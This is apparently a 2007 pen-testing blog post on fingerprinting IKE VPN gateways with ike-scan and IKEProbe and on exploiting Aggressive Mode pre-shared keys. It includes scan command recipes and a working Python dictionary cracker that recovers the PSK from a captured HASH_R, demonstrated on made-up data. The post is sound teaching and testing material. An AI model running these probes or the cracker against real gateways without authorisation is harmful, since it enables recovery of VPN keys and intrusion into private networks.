Wednesday, March 28, 2007

Testing for Cisco VPNs


Note: image from ike-scan wiki

OK guys, I know ike-scan has been out there for some time, but I would still love to blog about it. IPsec VPNs, Cisco's included, negotiate their tunnels with IKE on UDP port 500 (UDP 4500 once NAT traversal kicks in), and most of us know that the Cisco VPN 3000 Concentrator has had multiple published vulnerabilities, DoS and buffer overflows among them. ike-scan tests for the presence of an IKE gateway, fingerprints it from its retransmission back-off pattern and the Vendor ID payloads it returns, and checks whether the gateway will accept Aggressive Mode with pre-shared-key authentication. If it does, the responder's hash can be captured (--aggressive --pskcrack) and the PSK guessed offline with psk-crack later on. Once the PSK is cracked, and the group name (the ID the gateway expects) is known, authenticating to the vulnerable gateway should be no problem. Personally, I have tested multiple VPNs and only found a Cisco VPN 3000 Concentrator vulnerable. If you would like to know how to pen-test VPNs, check out the following articles:

http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
http://www.securityfocus.com/infocus/1821

It will be very useful to go through both articles in full and understand how IPsec, and IKE Phase 1 in particular, works before you start. As a penetration tester, these are the few commands I always use from the command prompt:

C:\ikescan>ike-scan xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.531 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --auth=3 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --auth=1 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --sport=0 --auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --multiline --sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --multiline --sport=0 --trans=5,2,1,2 --vendor=00 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --multiline --sport=0 --trans=5,2,1,2 --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan --multiline --sport=0 --trans=5,2,1,2 --aggressive --dport=443 xx.xx.xx.xx

As you can see, the list goes on and on: the same host is probed with a different authentication method (--auth=1 is pre-shared key, 3 is RSA signatures, 64221 is the Cisco-style Hybrid mode), from a random source port (--sport=0, handy when local UDP 500 is already taken or filtered), with one explicit transform instead of the default set (--trans=5,2,1,2 is 3DES, SHA1, PSK, DH group 2), in Aggressive Mode (--aggressive), and with a Vendor ID payload (--vendor) for gateways that stay silent unless a particular Vendor ID is present. In the last example I specify the destination port (--dport) to check whether the VPN is running on port 443; ike-scan treats a bare trailing number as another target host, not a port. I know Nortel can have VPN gateways running on SSL. The above results are from a Nortel VPN Gateway. Keep in mind that ike-scan only speaks IKE (over UDP by default, over TCP with --tcp), so an SSL VPN on 443 will never answer it, and a null result there says nothing about whether the SSL service exists.

If an IKE gateway is present and accepts one of the proposed transforms, the response looks like the one below. A returned Main Mode handshake confirms an IKE endpoint and tells you which transform it accepted and which Vendor IDs it advertises; on its own it is not proof of a vulnerability, that needs the Aggressive Mode check that follows:

C:\ikescan>ike-scan -v -s 0 xx.xx.xx.xx
Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
xx.xx.xx.xx Main Mode Handshake returned HDR=(CKY-R=fb07f15c64c1fef9) SA=(Enc=DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.8: 1 hosts scanned in 0.114 seconds (8.77 hosts/sec). 1 returned handshake; 0 returned notify
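To see what that line is actually decoding, here is an added example (not ike-scan's code) that builds the single-transform proposal a --trans=5,2,1,2 probe expresses and parses a responder message back into the same HDR/SA/VID summary. The response it parses is constructed to mirror the handshake above (the CKY-R, the DES/MD5/PSK/group 2 transform and the IKE Fragmentation Vendor ID are taken from it); nothing is sent on the wire, and the small Vendor ID name table and the 28800-second lifetime attribute are assumptions of the example, not something the post states.

```python
# Added example: build/decode IKEv1 Phase 1 (ISAKMP) messages as ike-scan summarises them.
# Not ike-scan code; the responder message is constructed, not a capture.
import struct

PAYLOAD_SA, PAYLOAD_VID = 1, 13                       # RFC 2408 payload types
EXCHANGE = {2: "Main Mode", 4: "Aggressive Mode"}      # RFC 2409 exchange types
ENC = {1: "DES", 5: "3DES", 7: "AES"}                  # attribute 1
HASH = {1: "MD5", 2: "SHA1"}                           # attribute 2
AUTH = {1: "PSK", 3: "RSA_Sig", 64221: "Hybrid_RSA", 65001: "XAUTH_PSK"}  # attribute 3
GROUP = {1: "1:modp768", 2: "2:modp1024", 5: "5:modp1536"}                # attribute 4
LIFETYPE = {1: "Seconds", 2: "Kilobytes"}              # attribute 11
KNOWN_VIDS = {  # assumed name table; ike-scan's full list lives in its ike-vendor-ids file
    "4048b7d56ebce88525e7de7f00d6c2d3c0000000": "IKE Fragmentation",
    "12f5f28c457168a9702d9fe274cc0100": "Cisco Unity",
}

def generic(next_payload, body):
    """Generic payload header: next payload, reserved, 16-bit length incl. header."""
    return struct.pack("!BBH", next_payload, 0, 4 + len(body)) + body

def basic_attr(atype, value):   # AF bit (0x8000) set: 16-bit value follows the type
    return struct.pack("!HH", 0x8000 | atype, value)

def var_attr(atype, value):     # AF bit clear: 16-bit length, then the value bytes
    return struct.pack("!HH", atype, len(value)) + value

def sa_body(enc, hsh, auth, group, lifetime=28800):
    """SA payload body: one proposal, one transform = --trans=enc,hash,auth,group.
    The lifetime attribute mirrors ike-scan's default of 28800 seconds (assumed)."""
    attrs = (basic_attr(1, enc) + basic_attr(2, hsh) + basic_attr(3, auth)
             + basic_attr(4, group) + basic_attr(11, 1)
             + var_attr(12, struct.pack("!I", lifetime)))
    transform = generic(0, struct.pack("!BBH", 1, 1, 0) + attrs)         # #1, KEY_IKE, reserved
    proposal = generic(0, struct.pack("!BBBB", 1, 1, 0, 1) + transform)  # #1, ISAKMP, SPI 0, 1 transform
    return struct.pack("!II", 1, 1) + proposal                           # DOI IPSEC, SIT_IDENTITY_ONLY

def build_message(cky_i, cky_r, exchange, payloads):
    """28-byte ISAKMP header followed by the chained payloads [(type, body), ...]."""
    chain = b""
    for i, (_ptype, body) in enumerate(payloads):
        chain += generic(payloads[i + 1][0] if i + 1 < len(payloads) else 0, body)
    header = struct.pack("!8s8sBBBBII", cky_i, cky_r, payloads[0][0],
                         0x10, exchange, 0, 0, 28 + len(chain))  # version 1.0, flags 0, msgid 0
    return header + chain

def parse_attrs(data):
    attrs, i = {}, 0
    while i + 4 <= len(data):
        raw, val = struct.unpack_from("!HH", data, i)
        if raw & 0x8000:                                  # basic: value inline
            attrs[raw & 0x7FFF], i = val, i + 4
        else:                                             # variable: val is a length
            attrs[raw], i = int.from_bytes(data[i + 4:i + 4 + val], "big"), i + 4 + val
    return attrs

def parse_message(msg):
    """Decode the header, the first SA transform and every Vendor ID payload."""
    _, cky_r, nxt, ver, exch, _, _, length = struct.unpack_from("!8s8sBBBBII", msg, 0)
    if ver >> 4 != 1 or length != len(msg):
        raise ValueError("not a well-formed ISAKMP v1 message")
    out = {"cky_r": cky_r.hex(), "exchange": EXCHANGE.get(exch, str(exch)), "vids": []}
    off = 28
    while nxt:
        nxt_after, _, plen = struct.unpack_from("!BBH", msg, off)
        if plen < 4 or off + plen > len(msg):
            raise ValueError("bad payload length")
        body = msg[off + 4:off + plen]
        if nxt == PAYLOAD_SA:
            # DOI(4) SIT(4) | proposal hdr(4)+fixed(4) | transform hdr(4)+fixed(4) | attributes
            tlen = struct.unpack_from("!H", body, 18)[0]
            a = parse_attrs(body[24:16 + tlen])
            out["sa"] = {"enc": ENC.get(a.get(1), str(a.get(1))), "hash": HASH.get(a.get(2), str(a.get(2))),
                         "group": GROUP.get(a.get(4), str(a.get(4))), "auth": AUTH.get(a.get(3), str(a.get(3))),
                         "lifetype": LIFETYPE.get(a.get(11), str(a.get(11))), "lifeduration": a.get(12)}
        elif nxt == PAYLOAD_VID:
            out["vids"].append(body.hex())
        nxt, off = nxt_after, off + plen
    return out

def format_like_ike_scan(parsed):
    sa = parsed["sa"]
    line = (f"{parsed['exchange']} Handshake returned HDR=(CKY-R={parsed['cky_r']}) "
            f"SA=(Enc={sa['enc']} Hash={sa['hash']} Group={sa['group']} Auth={sa['auth']} "
            f"LifeType={sa['lifetype']} LifeDuration={sa['lifeduration']})")
    for vid in parsed["vids"]:
        line += f" VID={vid}" + (f" ({KNOWN_VIDS[vid]})" if vid in KNOWN_VIDS else "")
    return line

def probe_for_trans(trans=(5, 2, 1, 2), cky_i=b"\x11" * 8):
    """Main Mode message 1: just the SA payload for --trans=...; CKY-R is still zero."""
    return build_message(cky_i, b"\x00" * 8, 2, [(PAYLOAD_SA, sa_body(*trans))])

def sample_response(cky_i=b"\x11" * 8):
    """Constructed reply mirroring the handshake in the post: DES/MD5/PSK/group 2 + VID."""
    vid = bytes.fromhex("4048b7d56ebce88525e7de7f00d6c2d3c0000000")
    return build_message(cky_i, bytes.fromhex("fb07f15c64c1fef9"), 2,
                         [(PAYLOAD_SA, sa_body(1, 1, 1, 2)), (PAYLOAD_VID, vid)])

if __name__ == "__main__":
    print(f"{len(probe_for_trans())}-byte probe for --trans=5,2,1,2")
    print(format_like_ike_scan(parse_message(sample_response())))
```

The point to take away is that the whole of the SA payload, including the transform the gateway chose, travels in the clear in both directions, which is why ike-scan can fingerprint a gateway without ever authenticating to it. A real responder also answers with a single transform (the one it accepted), so the parser only decodes the first one; a probe with eight default transforms would need a loop over proposals if you wanted to print them all.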

--------------------------------------------------------------------------------------------------


C:\ikeprobe>ikeprobe xx.xx.xx.xx
IKEProbe 0.1beta (c) 2003 Michael Thumann (www.ernw.de)
Portions Copyright (c) 2003 Cipherica Labs (www.cipherica.com)
Read license-cipherica.txt for LibIKE License Information
IKE Aggressive Mode PSK Vulnerability Scanner (Bugtraq ID 7423)

Supported Attributes
Ciphers : DES, 3DES, AES-128, CAST
Hashes : MD5, SHA1
Diffie Hellman Groups: DH Groups 1,2 and 5

IKE Proposal for Peer: xx.xx.xx.xx
Aggressive Mode activated ...

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 1

0.000 3: ph1_initiated(00443ee0, 003b4760)
0.016 3: << ph1 (00443ee0, 244)
0.016 3: >> 84
0.016 3: sx_recv_notify: error 14
0.016 3: sx_purge_spi: implement me - 0
2.516 3: << ph1 (00443ee0, 244)
2.516 3: >> 84
2.516 3: sx_recv_notify: error 14
2.516 3: sx_purge_spi: implement me - 0
5.531 3: << ph1 (00443ee0, 244)
16.047 3: >> 84
16.047 3: sx_recv_notify: error 14
16.047 3: sx_purge_spi: implement me - 0
19.547 3: ph1_disposed(00443ee0)

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 2

19.547 3: ph1_initiated(00443ee0, 003b4c08)
19.578 3: << ph1 (00443ee0, 276)
19.578 3: >> 437
19.625 3: ph1_get_psk(00443ee0)

*****************************************************************************
* System is vulnerable!! See http://www.securityfocus/bid/7423/ for details *
*****************************************************************************
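What IKEProbe's trace is showing: each "sx_recv_notify: error 14" is ISAKMP notify type 14, NO-PROPOSAL-CHOSEN, so the gateway rejected the DES/SHA1/DH group 1 proposal three times, while the DES/SHA1/DH group 2 proposal was answered with a full 437-byte Aggressive Mode reply and the library asked for the PSK (ph1_get_psk) to verify the responder's HASH_R. That is the weakness BID 7423 describes: in Aggressive Mode the gateway sends HASH_R, and every input to it other than the PSK itself, in the clear before the initiator has proven anything, so whoever can elicit (or sniff) that reply can guess the PSK offline at leisure. With ike-scan the same material is captured with --aggressive --id=<groupname> --pskcrack=<file> and fed to psk-crack (psk-crack -d wordlist <file>). The added example below, which is not ike-scan or psk-crack code, computes HASH_R as RFC 2409 defines it and runs the dictionary attack against a constructed capture; the exchange values (public values, cookies, nonces, the PSK cisco123) are made up for the demonstration, and the colon-separated field order is the one psk-crack input files use.

```python
# Added example: the offline PSK guess that 'Aggressive Mode + PSK' (BID 7423) allows.
# Not ike-scan or psk-crack code; every exchange value below is constructed, not captured.
import hashlib
import hmac
import random

PSKCRACK_FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

def prf(hash_name, key, data):
    """IKEv1 prf = HMAC keyed with the negotiated hash (MD5 or SHA1)."""
    return hmac.new(key, data, getattr(hashlib, hash_name)).digest()

def hash_r(psk, ex, hash_name):
    """RFC 2409 section 5.4, pre-shared key authentication:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    In Aggressive Mode every input except the PSK is sent in the clear in messages 1 and 2."""
    skeyid = prf(hash_name, psk, ex["ni_b"] + ex["nr_b"])
    return prf(hash_name, skeyid, ex["g_xr"] + ex["g_xi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])

def to_pskcrack_line(ex):
    """Colon-separated hex in the field order ike-scan --pskcrack writes for psk-crack."""
    return ":".join(ex[f].hex() for f in PSKCRACK_FIELDS)

def from_pskcrack_line(line):
    parts = line.strip().split(":")
    if len(parts) != len(PSKCRACK_FIELDS):
        raise ValueError("expected %d colon-separated fields" % len(PSKCRACK_FIELDS))
    return dict(zip(PSKCRACK_FIELDS, (bytes.fromhex(p) for p in parts)))

def crack(line, wordlist):
    """Dictionary attack: recompute HASH_R for each candidate and compare with the captured one.
    The hash algorithm is inferred from the digest length (16 bytes = MD5, 20 = SHA1)."""
    ex = from_pskcrack_line(line)
    hash_name = {16: "md5", 20: "sha1"}.get(len(ex["hash_r"]))
    if hash_name is None:
        raise ValueError("unsupported hash length %d" % len(ex["hash_r"]))
    for word in wordlist:
        if hmac.compare_digest(hash_r(word.encode(), ex, hash_name), ex["hash_r"]):
            return word
    return None

def constructed_capture(psk=b"cisco123", hash_name="md5", seed=7423):
    """Stand-in for a real --pskcrack file: random public values and nonces of realistic
    sizes (modp1024 DH values, 20-byte nonces) and HASH_R computed under `psk`."""
    rnd = random.Random(seed)

    def rb(n):
        return rnd.getrandbits(8 * n).to_bytes(n, "big")

    ex = {"g_xr": rb(128), "g_xi": rb(128), "cky_r": rb(8), "cky_i": rb(8),
          "sai_b": rb(52),                                 # initiator's SA payload body
          "idir_b": bytes([1, 17, 1, 244, 192, 0, 2, 1]),  # ID_IPV4_ADDR, UDP/500, 192.0.2.1
          "ni_b": rb(20), "nr_b": rb(20)}
    ex["hash_r"] = hash_r(psk, ex, hash_name)
    return to_pskcrack_line(ex)

if __name__ == "__main__":
    capture = constructed_capture()
    print(crack(capture, ["password", "vpn", "Cisco", "cisco123", "letmein"]))  # -> cisco123
```

Two caveats worth remembering when you run the real thing. The gateway only hands back a HASH_R worth cracking if the ID you send (the group name) is one it knows, so an unanswered --aggressive run is not a clean bill of health, and the recovered hash is only as weak as the PSK: a long random key, or certificates with Main Mode, leaves the dictionary attack with nothing to find.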
